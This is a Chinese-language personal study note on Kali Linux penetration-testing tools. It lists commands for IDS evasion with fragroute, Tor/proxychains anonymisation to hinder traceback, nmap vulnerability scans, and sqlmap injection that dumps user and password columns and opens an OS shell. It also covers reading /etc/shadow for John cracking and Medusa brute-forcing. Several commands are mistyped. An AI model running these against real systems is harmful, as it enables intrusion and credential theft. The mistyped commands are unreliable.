kali学习

kali常用工具

fragroute检测IDS/IPS

自定义/etc/fragroute.comf

tcp_seg 1 new
ip_frag 32
ip_chaff dup
ip_ttl 10
order random
print

具体干啥用的我也不知道
然后直接在终端 fragroute target.com

wafwoof检测waf

waf target.com

使用匿名网络代理Tor和Privoxy

1. 安装Tor
   apt-get install tor
2. 一旦安装了Tor，编辑位于/etc目录下的proxychains.conf文件。该文件规定了使用在Tor网络系统上的测试系统使用代理服务器的数量和顺序，如果代理服务器崩溃，禁用strict_chains，并且启用dynamic_chains，这就保证了连接将被路由。
3. 编辑[ProxyList]部分，以确保socks5代理存在。

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
socks5 127.0.0.1 9095

在网上很容易找到开放代理,并添加到proxychain.conf中.测试人员可以利用这一优势进而模糊自己的身份
4. 从终端窗口启动Tor服务
service tor start
确认已开启命令 service tor status
确认你的源ip地址命令
Firefox www.whatismyip.com
然后使用以下proxychains命令调用Tor路由
proxychains firefox www.whatismyip.com

通过访问https://check.torproject.org 可以验证Tor功能是否正常
www.dnsleaktest.com检查Dns泄露
在使用Tor时，要牢记如下注意事项：

• Tor提供匿名服务，但它不能保证隐私。出口节点的业主都能够嗅出流量，也有可能会访问用户凭证。
• 在Tor浏览器套件中的漏洞，据称被执法部门用于探测系统并获取用户信息。
• ProxyChains不处理UDP流量
• 某些浏览器应用程序（ActiveX、PDF、Flash、Java、RealPlay和QuickTime），可能用于获取你的IP地址。
• 某些应用程序和服务无法在这样的环境下运行，实际上，Metasploit与nmap可能不能运行。nmap的隐身SYN扫描被ProxyChains终止，且链接扫描被调用时，这可能会泄露信息。
• 攻击者也可以使用随机链接。使用此选项，ProxyChains将从我们的列表中随机选择IP地址，并用他们来创建ProxyChain。这意味着每次使用ProxzyChain时，代理链接将看起来与目标不同，从而更难从源头跟踪流量。
• 为此，以类似的方式编辑/etc/proxychains.conf文件，将dynamic.chains改为注释，取消random_chain注释，因为我们一次只能使用一个选项。
• 此外，攻击者可以使用chain_lea取消注释行，然后在创建一个随机代理链时去欸的那个链中的IP地址数。
  这项技术可以让攻击者在网络上保持匿名

nmap

nmap是常用的信息收集工具，在启动nmap执行漏洞扫描之前，渗透测试人员必须更新nmap脚本数据库，查看是否有新脚本添加到数据库中，防止错过该漏洞识别
nmap --script-updatedb
nmap -sT ip（网端）/24（查询网段存活的主机信息）
nmap -sS ip(利用隐蔽手法查询主机开启的端口号)
nmap -O ip（主机端口推断网络操作系统）
namp --script=vuln ip(利用脚本查询主机可利用的漏洞信息)
针对目标主机运行所有脚本：
**nmap -T4 -A -sV -v3 -d -oATargetoutput --script all --script-argsvulns.showalltarget,com

自定义nse脚本

local http=require 'http'
description = {[ This is my custom discovery on the network ]}
require("http")
function portrule(host,port)
return port.number ==80
end
function action(host,port)
local response
response = http.get(host,port,"/test.txt")
if response.status and response.status ~=404
then
return "successful"
end
end

将xxx.nse文件保存到/usr/share/nmap/scripts/文件中.然后进行测试脚本
nmap -vv -n -Pn -p --open --script xxx.nse 192.168.0.124
为了了解上面的NSE脚本，这里解释代码中的内容：

·local http:需要http-从LUA调用正确的库，该行调用HTTP脚本并将其作为本地请求。

·Description：测试者/研究人员可以输入脚本的解释。

·Categories：这通常有两个变量，其中一个声明它是安全还是侵入。

kali下的owasp-zap漏扫

快速扫描 被动扫描（浏览器设置代理 127.0.0.1：8080） 被动接收网站信息

sqlmap

sqlmap -u url 判断注入点
sqlmap -u url?id=1 --dbs 获取数据库信息
sqlmap -u url?id=1 --current --dbs 当前web应用使用的数据库
sqlmap -u url -D 数据库名字 --table 指定数据库 获取数据库中的表
sqlmap -u url -D 数据库名字 -T 表名 --columns 获取指定表中的详细信息
sqlmap -u url -D 数据库名字 -T 表名 -C id,user,password --dump 提取信息 可能是MD5加密的东西

sql下的cookie注入
判断注入点提交and 1=1时不可行
sqlmap -u url --cookie “id=x” --table --level 2 获取表
sqlmap -u url --cookie “id=x” --columns -T admin --level 2 获取字段
sqlmap -u url --cookie “id=x” --dump -T admin -C “username,password” --level 2 爆表
post登陆框注入(参数形式需要通过抓包获取）
方式1 用burp suite抓包 保存为txt文本的形式 然后运行命令 ./sqlmap.py -r search-test.txt -ptfUPass
方式2 直接sqlmap -u url/Longin.asp --forms
方式3 sqlmap -u url/Login.asp --data “tfUname=1&UPass=1”

交互写shell及命令执行
sqlmap -u url --os-cmd=ipconfig cmd为windows
sqlmap -u url --os-shell 需要加网站的根目录
net user xxx /add /del 添加/删除用户

kali强大的字典生成器crunch

crunch (7) (7) (bluedon) -o pass.txt(output) 生最大最小七位密码字典

cd /usr/share/crunch
cat charset.lst 查看密码库 可调用密码库中的方法
如 ： crunch 3 5 -f charset.lst ualpah-numeric -o /pass2.txt 大写字母和数字组成 最小3 最大5 位

指定密码元素参数 -p
crunch 1 5 -p zhangsan 0101 Jack

定义输出格式 @小写 ，大写 %数字 ^常用符号 +占位符 -t指定格式
curnch 7 7 -t jack,%^
crunch 5 5 -t ddd%% -p zhang san jack 0101(五个元素组成的密码 d表示指定元素)
head-n 10 /pass2.txt查看前十行
tail -n 10 /pass2txt查看后十行

kali密码攻击工具 John

unshadow /etc/passwd etc/shadow >~/file_to_crack
文件重定向
将两个文件结合在一起 创建一个含有用户名密码的详细文件
john自带密码字典

爆破命令
john --worldlist=/usr/shar/john/password.lst ~/file_to_crack

查看爆破完成的列表
john --show ~/file_to_crack

不使用字典直接进行爆破

john ~/file_to_crack

简单模式破解
john --single ~/file_to_crack

卡里密码攻击工具Medusa（美杜莎）

查看可用模块
medusa -d
使用telnet模块
medusa -M telnt -q

指定用户破解
medusa -h ip -u username(administrator) -P password.txt -M telent

检测空密码或密码与用户名相同(使用user字典) -f(参数 表示一旦有一个破解成功立刻停止)
medusa -M mysql -h ip -U user.txt -e ns -f

用户名密码爆破字典为相对路径 并导出到1.xt
medusa -M mysql -h ip -U user.txt -P password.txt -o 1.txt

kali信息收集 Dmitry

Dmitry可以用来收集以下信息： 1. 端口扫描 2. whois主机IP和域名信息 3. 从Netcraft.com获取主机信息 4. 子域名 5. 域名中包含的邮件地址 6. 类似一种社工类的工具。 Dmitry特点：Dmitry在搜集目标域名时的资料准确、快速、齐全，DMitry可以将收集的信息保存在一个文件中，方便查看。
dmitry -o www.bluedon.com -f -b(查询端口信息)
dmitry -win www.bluedon.com(子域名查询 用的Google引擎 需翻墙使用)
比nmap差点

kali信息嗅探p0f

p0f -i eth0 -p监听网卡eth0的所有数据包
类似于metaspkoit的sniffer模块

kali中类似御剑的后台扫描器dirb

dirb url
dirb url -X .html